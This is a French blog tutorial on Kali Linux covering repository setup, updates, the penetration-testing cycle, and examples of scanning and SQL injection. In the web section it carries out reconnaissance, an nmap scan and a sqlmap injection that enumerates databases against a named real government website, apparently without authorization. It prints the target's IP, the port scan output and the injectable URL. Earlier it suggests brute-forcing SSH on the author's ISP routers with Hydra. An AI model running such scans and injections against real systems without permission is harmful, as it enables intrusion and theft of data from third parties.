Tutoriel Kali Linux

Kali Linux Tutorial



Si vous êtes un expert ou au moins familier avec Linux, les commandes et l'environnement, que vous venez d'installer Kali Linux sur votre machine, que vous vouliez devenir un Master of Kali Linux ou un Ethical Hacker, vous êtes au bon endroit. Dans cet article, je couvrirai un didacticiel Kali Linux pour les utilisateurs de Linux qui ne sont pas encore familiarisés avec Kali et vous expliquerai certaines des techniques de base utilisées pour le piratage et les tests de sécurité lors de l'utilisation de Kali.

Qu'est-ce que Kali Linux ?

Kali Linux, ( première sortie le 13 mars 2013 ) qui était officiellement connu sous le nom de BackTrack, développé par la société de sécurité Offensive Security, est une distribution médico-légale et axée sur la sécurité basée sur la branche Testing de Debian. Kali Linux est conçu pour les tests d'intrusion, la récupération de données et la détection des menaces. Le projet est passé à un modèle de version continue plus tôt cette année dans le but de fournir des utilitaires de sécurité plus à jour aux utilisateurs de la distribution. Kali Linux est gratuit et le sera toujours. Il comprend plus de 600 outils de test d'intrusion.







Pourquoi Kali Linux ? Est-ce bon pour vous?

Kali Linux a récemment gagné en popularité. Et il y a une raison derrière cela. Le piratage est de retour dans la culture populaire et cela peut être attribué de manière significative à la série télévisée Mr. Robot. La popularité de M. Robot a aidé Kali Linux à attirer de nouveaux utilisateurs. Les personnes qui n'ont pratiquement aucune connaissance de Linux ou de tout ce qui concerne la sécurité informatique essaient maintenant d'utiliser Kali comme principale distribution Linux.



Notre distribution de tests de pénétration la plus avancée à ce jour. – Développeurs Kali Linux. (C'est écrit sur la page principale de Kali.org tout en haut de la page.) Qu'obtenez-vous de cette déclaration ? Remarquez-vous ceci : APTD (Advanced Penetration Testing Distribution) ? Il n'y a pas de terme piratage ici littéralement. Kali Linux est le même que les autres distributions Linux. En termes simples, il s'agit d'une distribution Linux dotée d'outils liés à la sécurité et destinée aux experts en sécurité réseau et informatique. Cependant, l'utilisation de Kali Linux se concentre uniquement sur la sécurité et la criminalistique.



Une distribution Linux n'est rien de plus qu'un ensemble contenant le noyau Linux, un ensemble d'utilitaires et d'applications de base et quelques paramètres par défaut. Ainsi, Kali Linux n'offre pas quelque chose d'unique en ce sens que la plupart des outils fournis pourraient être installés sur n'importe quelle distribution Linux.





Kali Linux est spécifiquement conçu pour répondre aux exigences des tests d'intrusion professionnels et des audits de sécurité. Il s'adresse à un sous-ensemble particulier d'utilisateurs de Linux. Pentesteurs, pirates informatiques, etc. Ce n'est pas une distribution recommandée si vous attendez Kali pour un bureau Linux à usage général pour le développement, la conception Web, les jeux, le bureau, etc. Kali peut vous poser des défis, même si vous êtes un utilisateur Linux expérimenté .

CHOSES À FAIRE APRÈS L'INSTALLATION DE KALI LINUX

Après avoir installé Kali Linux, vous vous demandez peut-être quoi faire ensuite, n'est-ce pas ?. Tout le monde est confronté à ce problème, ne vous inquiétez pas.



ÉTAPE 1 : METTRE EN PLACE LE RÉFÉRENCEMENT

Tout d'abord, vous le savez peut-être déjà, mais il est essentiel de définir correctement le référentiel. Comme je l'ai dit, le modèle de version continue de Kali Linux vise à fournir des utilitaires de sécurité plus à jour aux utilisateurs de la distribution. Généralement, si Kali Linux vient d'être installé, le référentiel fait référence au support que vous utilisez pour l'installation. Pour résoudre ce problème, vous devez remplacer le référentiel par le référentiel officiel Kali Linux. Le fichier requis se trouve sous /etc/apt/sources.list . Ouvrez le fichier avec l'éditeur de texte Leafpad et remplacez le référentiel par défaut par ce référentiel officiel Kali Rolling :

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

ÉTAPE 2 : METTRE À JOUR ET METTRE À JOUR VOTRE KALI LINUX

Après cette mise à jour et mise à niveau de votre système, synchronisez votre Kali Linux avec la dernière version. Pour cela, ouvrez le terminal et tapez :

apt update -y && apt upgrade -y && apt dist-upgrade 

La commande apt update télécharge et récupère les informations des listes de packages dans les référentiels et les met à jour pour obtenir des informations sur les dernières versions des packages et leurs dépendances.

La commande apt upgrade télécharge et installe une version plus récente des packages des packages Kali Linux installés tant qu'elle n'a pas d'erreurs sur les dépendances.

L'apt dist-upgrade mettra à jour tous les packages vers la dernière version disponible, quoi qu'il arrive. Et aussi installer et supprimer les dépendances selon les besoins (installer des dépendances pour satisfaire les packages, évidemment, mais également supprimer les dépendances devenues orphelines si un package mis à jour n'avait plus besoin de la dépendance.

CONCEPT DE BASE DE TEST DE PÉNÉTRATION AVEC KALI LINUX

Après avoir effectué ces étapes avec succès, il y a trois choses principales que vous pouvez faire avec Kali Linux en fonction du système ciblé, notamment :

  1. Piratage de réseau sans fil – Piratage Wifi, Phising, Empoisonnement ARP, etc.
  2. Piratage d'applications Web – Injection SQL, Cross-Site Request Forgery (CSRF), Web Phising, etc.
  3. Piratage d'appareils – Exploitez la machine cible pour en prendre le contrôle.

Je n'inclus pas le piratage IoT, cela ne signifie pas que Kali Linux n'a aucune capacité à cet effet. Mais, littéralement, cela pourrait aussi appartenir à Device Hacking. Étant donné que l'appareil a une apparence physique et une forme. Dans ce tutoriel, j'ai couvert les connaissances de base d'entre eux. Depuis, Kali Linux est énorme, il ne tient pas dans un seul article !

Vous devez également connaître le cycle ou la procédure de test de pénétration. Elles sont:

  1. Reconnaissance – Collecte d'informations
  2. Balayage
  3. Exploitation
  4. Post-Exploitation

PIRATAGE DE RÉSEAU SANS FIL AVEC KALI LINUX

En termes de piratage de réseau sans fil, la victime peut varier. Parce que les réseaux sans fil se composent de plusieurs éléments, tels que le FAI (fournisseur d'accès Internet), le routeur et ses partenaires (modem, concentrateur, commutateur, etc.) et les clients (utilisateurs, vidéosurveillance, ordinateur distant, etc.). Ils ont aussi des possibilités vulnérables.

Internet est un agrégat vaste et complexe de matériel réseau, relié entre eux par des passerelles. Le suivi de la route suivie par vos paquets est important pour savoir comment vous atteignez un certain nom d'hôte ou une adresse IP cible.

Kali Linux a un outil intégré appelé Traceroute. Traceroute utilise le champ de durée de vie du protocole IP et tente d'obtenir une réponse ICMP TIME_EXCEEDED de chaque passerelle le long du chemin vers un hôte. Traceroute tente de tracer la route qu'un paquet IP suivrait vers un hôte Internet en lançant des paquets de sonde avec un petit TTL (durée de vie), puis en écoutant une réponse ICMP dépassée par une passerelle. Je vais vous donner un exemple sur la façon de tracer un routeur ISP utilisé pour gérer notre connexion à l'aide de Traceroute.

1. Reconnaissance

La collecte d'informations est le point de départ le plus important, ne manquez pas cette étape. Dans cette étape, notre objectif est d'obtenir autant d'informations utiles que possible, puis ces informations sont utilisées pour les étapes ultérieures.

Tout d'abord, ouvrez un terminal et tapez cette commande pour commencer à tracer la route vers le site, dans ce cas, je définis le site sur google.com.

traceroute google.com 

Capture d'écran de traceroute

2. Numérisation

Une fois que nous avons lancé les commandes, il répertorie où notre paquet va dans l'ordre. Comme vous pouvez le voir ci-dessus, j'ai obtenu 3 sauts dont l'un est mon serveur ISP. La première adresse IP sur la liste est mon routeur, qui agit comme une passerelle. Et les deux suivants appartiennent à mon FAI. Vérifions maintenant le service qu'ils exécutent à l'aide de Nmap. Ainsi, les cibles que nous allons scanner sont 10.152.192.1 et 10.13.223.102 . Dans le terminal, j'ai exécuté la commande suivante :

nmap -v -sS [IP Target] -Pn 

Décomposons l'argument de la commande :

-v = Activer le mode verbosité

-sS = Utiliser la technique d'analyse TCP SYN

-Pn = Traiter tous les hôtes comme en ligne — ignorer la découverte des hôtes

Et voici le résultat que nous avons obtenu.

capture d'écran nmap 2

Malheureusement, tous les ports sur 10.152.192.1 sont filtrés, cela signifie que toutes les connexions TCP entrantes sont bloquées par l'IDS ou le pare-feu sur cette IP. Maintenant, prenons un autre scan vers la deuxième cible.

capture d'écran nmap 1

3. Exploitation

Dans cette procédure, je ne suis pas destiné à mener la véritable exploitation, je vous montre plutôt comment. Sur la base du résultat de l'analyse Nmap ci-dessus, nous savons que cette adresse IP a un serveur SSH exécuté sur le port 22 et qu'il est ouvert. Il est ouvert à être brutalement forcé, haha ! Nous avons trouvé le trou, ce serveur SSH est le trou possible auquel nous pourrions essayer d'accéder. Il existe plusieurs outils dans Kali Linux qui prennent en charge les attaques par force brute ou par dictionnaire contre le protocole SSH. Le plus populaire et le plus puissant est Hydra.

D'accord, il s'agissait d'une procédure de base effectuant un test d'intrusion sur un serveur ciblé, qui, dans notre exemple, est mon serveur FAI.

PIRATAGE D'APPLICATIONS WEB AVEC KALI LINUX

En fait, si cela vous passionne, vous pouvez configurer votre environnement de piratage en installant DWVA (Damn Vulnerable Web App) dans votre Kali Linux. C'est une application Web PHP/MySQL qui a un tas de trous vulnérables. Ses principaux objectifs sont d'aider les professionnels de la sécurité à tester leurs compétences et leurs outils dans un environnement juridique, et d'aider les développeurs Web à mieux comprendre les processus de sécurisation des applications Web. Vous pouvez obtenir DWVA gratuitement sur Github ici : https://github.com/ethicalhack3r/DVWA.

Pour l'instant, je vais vous montrer comment faire du piratage d'applications Web sur un vrai site. Mais, promettez-moi qu'il est limité à des fins éducatives uniquement. Nous allons simuler une attaque réelle sur un site réel en utilisant l'injection SQL.

Prérequis

Outils couverts :

– Whatweb (pré-installé)

– Nmap (pré-installé)

– SQLiv (installer manuellement)

– SQLMap (pré-installé)

Nous avons besoin d'un autre outil supplémentaire disponible sur Github ici : https://github.com/Hadesy2k/sqliv, installez-le d'abord sur notre Kali Linux. Cet outil nommé SQLiv qui est capable de faire une analyse ciblée en fournissant un domaine spécifique (avec crawling). Tapez dans le terminal :

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cible : www.trenggalekkab.go.id

1. Reconnaissance

Recueillez autant d'informations utiles que possible. Nous pourrions ouvrir la page Web et détecter quelle application s'exécute sur ce site. Tout d'abord, vérifions de quel type de site il s'agit. Nous allons utiliser whatweb pour le faire.

whatweb www.trenggalekkab.go.id 

Quelle capture d'écran Web

Comme vous pouvez le voir sur le résultat ci-dessus, la cible est située en Indonésie. Ça marche Apache v2.2.27 sur son serveur Web et a également PHP v5.4.31 , il a une adresse IP 103.247.21.142 . D'accord, prends note de ça. Vous devrez peut-être visiter sa page Web, rechercher le fichier ou la page construit, les paramètres d'URL ou même le formulaire de connexion. Pour l'instant, nous avons besoin de cette adresse IP pour la prochaine étape de numérisation.

2. Numérisation

Comme auparavant, nous utilisons à nouveau Nmap pour analyser quels ports et services s'exécutent sur la cible.

nmap -v -sS 103.247.21.142 

Et voici le résultat que nous avons obtenu :

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Il y a un tas de ports ouverts qui gèrent chaque service sur la cible, mais celui qui semble accrocheur est ce service mysql sur le port 3306. Il est indiqué que ce site utilise mysql gérer leurs informations dans des bases de données. Ensuite, je me demande s'il existe des vulnérabilités d'injection SQL sur ce site. Donc, je scanne à nouveau le site en utilisant SQLiv que nous venons d'installer. J'ai tapé la commande :

sqliv -t www.trenggalekkab.go.id 

Capture d'écran SQLHacking1

Nous avons trouvé 2 URL vulnérables SQL possibles sur ce site. Prenez note de ces URL.

3. Exploitation

Ok, nous avons des URL SQL vulnérables et prêtes à être exécutées. Pour ce faire, nous utiliserons SQLMap. La syntaxe est :

sqlmap [Vulnerable URL] --dbs 

La commande devrait ressembler à ceci :

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

L'argument –dbs indique à SQLMap d'obtenir les bases de données cibles. Voici le résultat que nous avons obtenu :

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap a trouvé 2 bases de données, mais une seule d'entre elles contenant des données sensibles, telles qu'un compte d'identification d'administrateur. C'est sur trengkab_trg. Après avoir trouvé les bases de données, il y a encore une autre étape que nous devons faire. Il s'agit de trouver les tables et les colonnes et la dernière étape consiste à vider les données. Je ne vais pas vous montrer comment ici dans cette section, en utilisant cette cible. Au moins, vous connaissez l'idée de base sur le cycle d'attaque et l'utilisation de certains outils.

PIRATAGE DE DISPOSITIF

Dans un prochain article sur ce site, nous couvrirons le piratage d'appareils, restez à l'écoute. En guise d'avertissement, vous voudrez vous assurer de connaître Python pour cela.